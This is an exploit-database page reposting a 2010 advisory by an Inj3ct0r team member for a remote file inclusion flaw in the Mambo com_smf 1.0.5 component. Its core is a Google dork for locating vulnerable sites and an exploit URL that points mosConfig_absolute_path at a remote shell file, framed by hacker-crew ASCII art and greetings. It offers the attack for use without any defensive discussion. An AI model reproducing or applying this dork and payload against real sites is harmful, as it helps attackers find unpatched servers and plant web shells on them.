Advertisement






The Mambo SMF component 1.0.5 remote file inclusion vulnerability

CVE Category Price Severity
CWE-Other Not specified Not specified
Author Risk Exploitation Type Date
Not specified Not specified Remote 2010-11-16
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010110028

Below is a copy:

=========================================================
Mambo Component com_smf 1.0.5 RFI Vulnerability
=========================================================

[+]Title : Mambo Component com_smf 1.0.5 RFI Vulnerability
[+]Software  : SMF 1.0.5 
[+]Vendor  : http://mamboserver.com/
[+]Download : http://download.simplemachines.org/
[+]Author : jos_ali_joe
[+]Contact : josalijoe[at]yahoo[dot]com
[+]Home  : http://josalijoe.wordpress.com/


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ##########################################        1
0                    I'm jos_ali_joe  member from Inj3ct0r Team        1
1                    ##########################################        0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

########################################################################

Dork : inurl:index.php?option="com_smf"

########################################################################

------------------------------------------------------------------------

RFI Exploit

Exploit :

http://example.com/components/com_smf/smf.php?mosConfig_absolute_path=[ Shell txt ]

--------------------------------------------------------------------------


Greets For :

./Devilzc0de crew � Kebumen Cyber � Explore Crew � Indonesian Hacker - Tecon Crew - Security Hub

./Byroe Net - Yogya Carderlink - anten4

My Team : ./Indonesian Coder & inj3ct0r

Special Thanks :

/. google.com


[+] Note : 

Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. 
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, 
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.